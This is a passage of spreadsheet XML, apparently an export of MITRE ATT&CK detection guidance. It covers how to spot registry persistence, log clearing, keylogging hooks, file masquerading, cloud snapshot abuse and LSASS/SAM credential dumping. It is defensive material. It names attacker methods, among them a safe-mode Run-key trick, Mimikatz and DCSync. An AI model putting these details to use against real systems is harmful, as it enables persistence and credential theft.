    <t>Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)
Monitor execution of processes and commands associated with making configuration changes to boot settings, such as &lt;code&gt;bcdedit.exe&lt;/code&gt; and &lt;code&gt;bootcfg.exe&lt;/code&gt;.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. </t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity.
Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t>Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").</t>
  </si>
  <si>
    <t>It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows &lt;code&gt;netsh interface portproxy&lt;/code&gt; modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) 
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. </t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. </t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE, Office Open XML, CSV, and other files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</t>
  </si>
  <si>
    <t>Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.</t>
  </si>
  <si>
    <t>If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Detection methods should include looking for common formats of RTLO characters within filenames such as &lt;code&gt;\u202E&lt;/code&gt;, &lt;code&gt;[U+202E]&lt;/code&gt;, and &lt;code&gt;%E2%80%AE&lt;/code&gt;. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference. 
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Monitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The &lt;code&gt;Store passwords using reversible encryption&lt;/code&gt; configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt;, &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). </t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t>Monitor property changes in Group Policy: &lt;code&gt;Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption&lt;/code&gt;. By default, the property should be set to Disabled.
Monitor command-line usage for &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt; or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). Furthermore, consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;, that change account configurations. 
Monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor user account logs as well as 2FA/MFA application logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism. </t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. 
Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. </t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</t>
  </si>
  <si>
    <t>Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>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
Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</t>
  </si>
  <si>
    <t>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
Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.
In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors.</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) 
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. 
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
